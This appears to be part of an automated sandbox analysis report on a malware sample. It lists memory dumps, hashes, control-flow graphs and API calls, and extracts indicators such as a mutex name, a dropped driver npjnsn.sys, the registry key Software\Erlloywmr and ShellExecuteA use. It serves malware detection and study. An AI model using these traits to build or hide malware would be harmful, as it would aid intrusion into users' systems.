• Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: f21209ab260277400cb49d672948d7085ffb39f1bcdcfac83583043ccb3889b2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB12C71A1028D8FEF10EF14CC44BA937E5FF44304F4849A5DD09AF2A2D375AA98CB4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: d10906f3b958b7bf630708f43ee79f820ebdfc47fd4549e7dc93893a596fe42d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0111E71250288ABEF10EEA08D4DFED37A8EF44B01F040414BB09EE0E1DAB19644873B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 74111f3679427098ce90a7b62af0f61459f5e0f102ab7d17c25d68f679424c1f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A615E71740288ABEF16DFA0CC49FEA37A8EB04701F550915EF09BF1F0D6B166448B5A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: d9b3289aa44f258d5103b908aef39f7fa3301f30d1e6178c9f73ce1b67587242
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72B12531A002898FEB15CF24CD84BA93BE5FF44304F494925DE49AF6A1D375BA94CF4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: ceb66df7ae4284b51411c98eb5c1b66c82f735cc70db7d343488cea4a7e1d7bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F111E31340288ABEF55DEA08D4DFD937A8AB44B01F440815BB09EE0E0DAB1A644872B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 5100543874fe88212dd5caeb45c10a9772bdfde687200c9dc2e12094868f6133
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0614D71640289ABEF11DF60CC49FAA3B6CEF44B05F444516FE09BF2F0D6B1A6448B5A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 43fb5ee287046be696cc6242341ebbe34ab00377fabd72383aeeb9f03033c0e4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5B13E75A001898FEF10CF58CC44BA93BA9FF44314F484966ED0DAF3A1D375AA95CB4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 5e594af184c786063cfb4ccc062c4bcd518c7e9f4eec7d2473b8cd9bac6b021a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36111E71240288ABEF11DFA48D4DFEA3BACAB44B01F040415BA09EE1E0DAB19644872B

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:21%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                    Total number of Nodes:348
                                                                                                                                                                                                                                    Total number of Limit Nodes:51
28aa75a 75A38400 75A38400 8065->8067 8067->8064 8067->8065 8068 28b0945 8067->8068 8069 28b09a9 8068->8069 8072 28aa677 8069->8072 8071 28b09b5 8071->8067 8074 28aa68a 8072->8074 8073 28aa757 8073->8071 8074->8073 8075 28aa70f 8074->8075 8076 28aa6c5 8074->8076 8078 28aa748 75A38400 8075->8078 8077 28aa6fe 75A38400 8076->8077 8077->8073 8078->8073 8079 28b3062 8080 28b308c 8079->8080 8081 28b2fff 2 API calls 8080->8081 8086 28b3188 8081->8086 8082 28b3744 8086->8082 8087 28b2ebc 8086->8087 8095 28aa2ad 76BE5A90 8086->8095 8097 28b2b8e 8086->8097 8088 28b2f09 8087->8088 8089 28b2f37 7686EB20 8088->8089 8091 28b2f44 8088->8091 8089->8091 8092 28b2f8b 8091->8092 8101 28b2e32 8091->8101 8093 28b2ffa 8092->8093 8094 28b2e32 2 API calls 8092->8094 8093->8086 8094->8092 8096 28aa2f0 8095->8096 8096->8086 8099 28b2c23 8097->8099 8098 28b2dee 8098->8086 8099->8098 8100 28b2ddd 75A38400 8099->8100 8100->8098 8102 28b2e58 8101->8102 8103 28b2e5c 7686EB20 8102->8103 8104 28b2e80 8102->8104 8106 28b2eb8 8103->8106 8104->8106 8107 28b2eae 7686EB20 8104->8107 8106->8091 8107->8106 8154 28b4567 8155 28b4585 8154->8155 8158 28b3b60 8155->8158 8157 28b45ba 8159 28b3b8a 8158->8159 8160 28b2ebc 3 API calls 8159->8160 8161 28b3c0d 771B0BD0 8160->8161 8162 28b3c28 771AF550 771AF550 771AF550 8161->8162 8163 28b3c72 771B0BD0 8161->8163 8162->8163 8164 28b3c8e 771AF550 771AF550 771AF550 771AF550 8163->8164 8165 28b3cf1 8163->8165 8164->8165 8166 28b3d4d 8165->8166 8167 28b3d40 7686EB20 8165->8167 8168 28b3d9c 7686EB20 8166->8168 8169 28b3da9 8166->8169 8167->8166 8168->8169 8170 28b3e08 75A38400 8169->8170 8172 28b3e5f 8169->8172 8171 28b3e32 7686EB20 8170->8171 8171->8172 8174 28b3f08 7686EB20 8172->8174 8175 28b3f15 8172->8175 8174->8175 8176 28b0b9a 75A38400 8175->8176 8177 28b40eb 8176->8177 8178 28b0b9a 75A38400 8177->8178 8179 28b4133 8177->8179 8178->8179 8180 28a5760 3 API calls 8179->8180 8181 28b4246 8180->8181 8182 28b4331 8181->8182 8187 28b4256 8181->8187 8183 28a5760 3 API 
calls 8182->8183 8184 28b432c 8183->8184 8197 28a4d96 8184->8197 8185 28a5760 3 API calls 8185->8184 8187->8185 8188 28b434a 8220 28a55be 8188->8220 8192 28b4366 8194 28b43b0 75A38400 8192->8194 8195 28b43c6 8192->8195 8193 28b44a3 8193->8157 8194->8195 8195->8193 8196 28b447a 75A38400 8195->8196 8196->8193 8196->8195 8198 28a4dc0 8197->8198 8199 28a4e7e 75A38400 8198->8199 8208 28a4e3c 8198->8208 8200 28a4eaf 8199->8200 8201 28a5112 8200->8201 8206 28a4eb7 8200->8206 8202 28a513a 75A38400 8201->8202 8211 28a5165 8201->8211 8202->8211 8203 28a5433 7686EB20 8203->8208 8204 28a5199 8204->8188 8205 28a4f1a 8205->8208 8209 28a4f52 75A38400 8205->8209 8210 28a5085 7686EB20 8205->8210 8206->8205 8207 28a6330 6 API calls 8206->8207 8206->8208 8207->8205 8208->8188 8212 28a4f9c 8209->8212 8218 28a4fa9 8209->8218 8210->8208 8211->8204 8216 28a6330 6 API calls 8211->8216 8219 28a5403 8211->8219 8212->8211 8213 28a5007 8212->8213 8214 28a4fe5 8212->8214 8212->8218 8217 28a4a5b 75A38400 8213->8217 8215 28a4a5b 75A38400 8214->8215 8215->8218 8216->8219 8217->8218 8218->8188 8219->8203 8219->8208 8223 28a563d 8220->8223 8221 28a5742 8221->8192 8224 28aa553 8221->8224 8222 28a6330 6 API calls 8222->8221 8223->8221 8223->8222 8226 28aa59f 8224->8226 8225 28aa660 8225->8192 8226->8225 8227 28aa613 75A38400 8226->8227 8227->8225 8359 292d760 8360 292d765 __common_dcos_data 2 API calls 8359->8360 8360->8359 8285 28a4bf9 8286 28a4c08 8285->8286 8287 28a4d68 7686EB20 8286->8287 8288 28a4c15 75A38400 8286->8288 8289 28a4d75 8287->8289 8290 28a4c60 8288->8290 8295 28a4c6d 8288->8295 8291 28a4cbc 8290->8291 8292 28a4ce5 8290->8292 8290->8295 8294 28a4a5b 75A38400 8291->8294 8293 28a4a5b 75A38400 8292->8293 8293->8295 8294->8295 8310 28b3238 8311 28b31f9 8310->8311 8312 28b3744 8311->8312 8313 28b2ebc 3 API calls 8311->8313 8314 28aa2ad 76BE5A90 8311->8314 8315 28b2b8e 75A38400 8311->8315 8313->8311 8314->8311 8315->8311 8361 28a777d 8362 28a77b5 8361->8362 8367 28a7875 8361->8367 8363 
28a7824 8362->8363 8365 28a78ff 8362->8365 8362->8367 8364 28a719b 6 API calls 8363->8364 8364->8367 8366 28a6330 6 API calls 8365->8366 8365->8367 8366->8367 8267 28b1ab1 8269 28b1a5a 8267->8269 8268 28b195d 75A38400 8271 28b1c69 8268->8271 8270 28b0b9a 75A38400 8269->8270 8269->8271 8272 28b1b47 8269->8272 8270->8272 8272->8268 8296 28a8bf1 8300 28a8a39 8296->8300 8297 28a8db5 8298 28b0945 2 API calls 8298->8300 8299 28aa75a 75A38400 75A38400 8299->8300 8300->8297 8300->8298 8300->8299 8316 28a4f36 8317 28a4f45 8316->8317 8318 28a4f52 75A38400 8317->8318 8319 28a5085 7686EB20 8317->8319 8320 28a4f9c 8318->8320 8325 28a4fa9 8318->8325 8326 28a50d2 8319->8326 8321 28a5007 8320->8321 8322 28a4fe5 8320->8322 8320->8325 8328 28a5215 8320->8328 8324 28a4a5b 75A38400 8321->8324 8323 28a4a5b 75A38400 8322->8323 8323->8325 8324->8325 8327 28a5433 7686EB20 8327->8326 8329 28a6330 6 API calls 8328->8329 8330 28a5403 8328->8330 8329->8330 8330->8326 8330->8327 8256 28aa2f5 8258 28aa360 8256->8258 8257 28aa542 8258->8257 8259 28aa2ad 76BE5A90 8258->8259 8259->8258

Control-flow Graph
                                                                                                                                                                                                                                    control_flow_graph 0 28b3b60-28b3c26 call 28b8060 call 28b2ebc 771B0BD0 5 28b3c28-28b3c6d 771AF550 * 3 0->5 6 28b3c72-28b3c8c 771B0BD0 0->6 5->6 7 28b3c8e-28b3cec 771AF550 * 4 6->7 8 28b3cf1-28b3d13 6->8 7->8 10 28b3d4d-28b3d6f 8->10 11 28b3d15-28b3d47 7686EB20 8->11 14 28b3da9-28b3df2 10->14 15 28b3d71-28b3da3 7686EB20 10->15 11->10 20 28b3e5f-28b3e81 14->20 21 28b3df4-28b3e59 75A38400 7686EB20 14->21 15->14 24 28b3e87-28b3f0f 7686EB20 20->24 25 28b3f15-28b3f3a 20->25 21->20 24->25 32 28b3f4c-28b3f7a 25->32 33 28b3f3c-28b3f41 25->33 37 28b3fc9-28b4007 32->37 38 28b3f7c-28b3fc2 32->38 33->32 43 28b4009-28b4016 37->43 44 28b401d-28b403d call 28b772b 37->44 38->37 43->44 47 28b404e-28b4061 44->47 49 28b4063-28b406a 47->49 50 28b40e1-28b40f0 call 28b0b9a 47->50 49->50 52 28b406c-28b4099 49->52 56 28b414d-28b4152 50->56 57 28b40f2-28b4117 50->57 53 28b409b-28b40a4 52->53 54 28b40aa-28b40dc 52->54 53->54 54->47 60 28b415d-28b4167 56->60 65 28b4129-28b412e call 28b0b9a 57->65 66 28b4119-28b411e 57->66 62 28b4178-28b418b 60->62 67 28b418d-28b4194 62->67 68 28b4205-28b4250 call 28a477f call 28a6274 call 28a5760 call 28a5c26 62->68 70 28b4133-28b4138 65->70 66->65 67->68 71 28b4196-28b41ca 67->71 88 28b4331-28b4333 call 28a5760 68->88 89 28b4256-28b429b call 28ac89a 68->89 72 28b414b 70->72 73 28b413a-28b4140 70->73 75 28b41db-28b4200 71->75 76 28b41cc-28b41d5 71->76 72->60 73->72 75->62 76->75 93 28b4338 88->93 95 28b42ac-28b42b6 89->95 94 28b433b-28b435f call 28a8701 call 28a4d96 call 28a55be 93->94 114 28b4361 call 28aa553 94->114 115 28b4366-28b4389 94->115 97 28b42b8-28b42e7 95->97 98 28b4325-28b432f call 28a5760 95->98 100 28b42e9-28b42f7 97->100 101 28b431e 97->101 98->94 100->101 104 28b42f9-28b4320 call 28a5e86 100->104 101->98 104->95 
114->115 117 28b438b-28b4395 115->117 118 28b4397-28b43c3 call 28a44cb 75A38400 115->118 117->118 119 28b43c6 117->119 118->119 121 28b43d0-28b43e0 119->121 123 28b44aa-28b44e3 121->123 124 28b43e6-28b43f6 121->124 135 28b44f5-28b4566 123->135 136 28b44e5-28b44ea 123->136 124->123 126 28b43fc-28b440b 124->126 126->123 128 28b4411-28b4447 126->128 129 28b4449-28b4455 128->129 130 28b4457 128->130 132 28b4461-28b44a1 75A38400 129->132 130->132 137 28b44a3 132->137 138 28b44a5 132->138 136->135 137->123 138->121
APIs
  • Part of subcall function 028B2EBC: 7686EB20.ADVAPI32(?), ref: 028B2F3E
• 771B0BD0.KERNEL32(028A2154), ref: 028B3C13
• 771AF550.KERNEL32(00000000,028A278C), ref: 028B3C36
• 771AF550.KERNEL32(00000000,028A27A0), ref: 028B3C4E
• 771AF550.KERNEL32(00000000,028A27B0), ref: 028B3C67
• 771B0BD0.KERNEL32(028A2894), ref: 028B3C79
• 771AF550.KERNEL32(00000000,028A28D8), ref: 028B3C9C
• 771AF550.KERNEL32(00000000,028A28B0), ref: 028B3CB5
• 771AF550.KERNEL32(00000000,028A28C4), ref: 028B3CCD
• 771AF550.KERNEL32(00000000,028A28A0), ref: 028B3CE6
• 7686EB20.ADVAPI32(00000000), ref: 028B3D47
• 7686EB20.ADVAPI32(00000000), ref: 028B3DA3
• 75A38400.USER32(00000000,028A23E0,00000000), ref: 028B3E1C
• 7686EB20.ADVAPI32(?), ref: 028B3E59
• 7686EB20.ADVAPI32(00000000), ref: 028B3F0F
  • Part of subcall function 028B0B9A: 75A38400.USER32(?), ref: 028B0BEF
• 75A38400.USER32(46390628699,028A22B4,00000000), ref: 028B43BD
• 75A38400.USER32(?), ref: 028B4482
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: F550$7686$A38400
• String ID: 46390628699$C:\Users\user~1\AppData\Local\Temp\mqiwauwsp.log$C:\Windows\system32\drivers\npjnsn.sys$Software\$Software\Erlloywmr$fronC:\Windows\$n
• API String ID: 430827005-296377573
• Opcode ID: 71fba9ced32656a28ae87eca0d6a54fb5a263805ee44f505e1b6198725dea589
• Instruction ID: e87abc53f94511460dcc2c7f00c48208e6d38be26ef4538bc9ffe11f532169d9
• Opcode Fuzzy Hash: 71fba9ced32656a28ae87eca0d6a54fb5a263805ee44f505e1b6198725dea589
• Instruction Fuzzy Hash: F04202BCE80618DFEB25DB68DC9DBEA77B5AF48701F004598E20DE6281DB745A91CF10

Control-flow Graph
                                                                                                                                                                                                                                    control_flow_graph 144 28a9eea-28a9ef7 145 28a9ef9-28a9f04 144->145 146 28a9f06 144->146 147 28a9f11-28a9f5a call 28a8f51 * 2 771B0BD0 145->147 146->147 153 28aa149 147->153 154 28a9f60-28a9f7c 771AF550 147->154 157 28aa151-28aa168 153->157 155 28a9f7e 154->155 156 28a9f83-28a9fa0 771AF550 154->156 158 28a9fa2 156->158 159 28a9fa7-28a9fc4 771AF550 156->159 161 28a9fcb-28a9fe7 771AF550 159->161 162 28a9fc6 159->162 163 28a9fe9 161->163 164 28a9fee-28aa00b 771AF550 161->164 165 28aa00d 164->165 166 28aa012-28aa02f 771AF550 164->166 167 28aa031 166->167 168 28aa036-28aa052 771AF550 166->168 169 28aa059-28aa076 771AF550 168->169 170 28aa054 168->170 171 28aa078 169->171 172 28aa07d-28aa0ba call 28a92f3 call 28a41c6 771B0BD0 169->172 173 28aa155 171->173 172->153 179 28aa0c0-28aa0dc 771AF550 172->179 173->153 179->153 180 28aa0de-28aa0e5 call 28a917d 179->180 183 28aa113 call 28a917d 180->183 184 28aa0e7-28aa110 call 28a45d2 call 28a9243 180->184 188 28aa118-28aa11a 183->188 184->183 188->153 190 28aa11c-28aa123 call 28a9706 188->190 190->153 194 28aa125-28aa146 call 28a41c6 190->194 194->153
APIs
• 771B0BD0.KERNEL32(028A27C0), ref: 028A9F4D
• 771AF550.KERNEL32(00000000,028A27D0), ref: 028A9F6A
• 771AF550.KERNEL32(00000000,028A27E0), ref: 028A9F8E
• 771AF550.KERNEL32(00000000,028A27F0), ref: 028A9FB2
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: F550
• String ID: C:\Windows\system32\drivers\npjnsn.sys
• API String ID: 963841436-2135717084
• Opcode ID: 06acb5561f23f06c325fd5d83bbdbec09ef8d27588d2fb4cf60805dd2efb42eb
• Instruction ID: b1b872cb29a31ffa941b21a69d3773d926aa8cf38e6740aebb9effd5e6d65541
• Opcode Fuzzy Hash: 06acb5561f23f06c325fd5d83bbdbec09ef8d27588d2fb4cf60805dd2efb42eb
• Instruction Fuzzy Hash: 2661597DD84204EFE714EBA8EC5DB6A33B8A708705F108D19E60AE26C0DF765566CF21

Control-flow Graph
                                                                                                                                                                                                                                    control_flow_graph 744 28a4d96-28a4e3a call 28b8060 747 28a4e3c 744->747 748 28a4e41-28a4eb1 75A38400 744->748 749 28a5459-28a5469 747->749 753 28a5112-28a5134 748->753 754 28a4eb7-28a4ed2 748->754 757 28a513a-28a5163 75A38400 753->757 758 28a529e-28a52a5 753->758 761 28a4ee0-28a4f04 call 28ac89a 754->761 762 28a4ed4-28a4edb 754->762 763 28a51a0-28a51d0 757->763 764 28a5165-28a518e 757->764 759 28a542a-28a5431 758->759 760 28a52ab-28a53fe call 28b772b * 5 call 28a6330 758->760 766 28a5433-28a543a 7686EB20 759->766 767 28a5440-28a5447 759->767 829 28a5403-28a5408 760->829 782 28a4f1d-28a4f24 761->782 783 28a4f06-28a4f1a call 28a6330 761->783 762->749 770 28a51d7-28a51d9 763->770 769 28a5195-28a5197 764->769 766->767 767->749 773 28a5199 769->773 774 28a519e 769->774 775 28a51db 770->775 776 28a51e0-28a5202 770->776 774->776 775->776 779 28a5208-28a520e 776->779 780 28a5299 776->780 784 28a523f-28a524d 779->784 785 28a524f-28a525b 779->785 786 28a527c-28a5296 call 28a49f9 779->786 787 28a525d-28a527a call 28a49f9 779->787 788 28a5223-28a522f 779->788 789 28a5231-28a523d 779->789 790 28a5215-28a5221 779->790 780->758 795 28a4f2a-28a4f4c 782->795 796 28a50f0-28a50f7 782->796 783->782 784->780 785->780 786->780 787->780 788->780 789->780 790->780 806 28a4f52-28a4f96 75A38400 795->806 807 28a5085-28a50ed 7686EB20 call 28b772b * 2 795->807 803 28a50f9-28a50ff 796->803 804 28a5106-28a510d 796->804 803->804 804->749 810 28a4f9c-28a4fa2 806->810 811 28a5027-28a502e 806->811 807->796 810->784 810->785 810->786 810->787 810->788 810->789 810->790 816 28a4fa9-28a4fb3 810->816 817 28a4fcd-28a4fd7 810->817 818 28a4fc1-28a4fcb 810->818 819 28a5007-28a5020 call 28a4a5b 810->819 820 28a4fe5-28a5005 call 28a4a5b 810->820 821 28a4fd9-28a4fe3 810->821 822 
28a4fb5-28a4fbf 810->822 814 28a5053-28a5079 811->814 815 28a5030-28a5051 811->815 835 28a5080 814->835 815->835 816->811 817->811 818->811 819->811 820->811 821->811 822->811 833 28a540a-28a5423 call 28b772b 829->833 834 28a5425 829->834 833->759 834->759
APIs
• 75A38400.USER32(00000000), ref: 028A4E86
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID: Software\Erlloywmr$\%d$fronC:\Windows\
• API String ID: 2082808161-3772162829
• Opcode ID: 5144617e83d37c0985665bb88e283ad757237a26b6172bcb8632a27bf3f5787b
• Instruction ID: 466224ed7ea1e3076c823c400c538e57cf293c37c1eb1387ffd01556eb5c1092
• Opcode Fuzzy Hash: 5144617e83d37c0985665bb88e283ad757237a26b6172bcb8632a27bf3f5787b
• Instruction Fuzzy Hash: AA02AEBDD01218DBEB20CF54CC94BE9B7B9BB48304F0886D9E519A7280DB769B94CF51

Control-flow Graph (entry block 28a5760-28a57e1; graph rendering and node/edge listing omitted)
APIs
• 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686
• String ID: %c%d_%d$%c%d_%d$Software\Erlloywmr$fronC:\Windows\
• API String ID: 3028004676-255879431
• Opcode ID: ac0ac447294d4c569355287c54c22dd3fdd1d4001ea1987c2ac49ce3691aba64
• Instruction ID: d22cfa0d288a98997d43d7fbe0358908677b5033e1342d4e5ea9dfdecf6dfaba
• Opcode Fuzzy Hash: ac0ac447294d4c569355287c54c22dd3fdd1d4001ea1987c2ac49ce3691aba64
• Instruction Fuzzy Hash: 7AC12978D44218DBEB24CF54DC98BE9B7B4AB58304F5081C9D50AAB290DB785BC5CF90

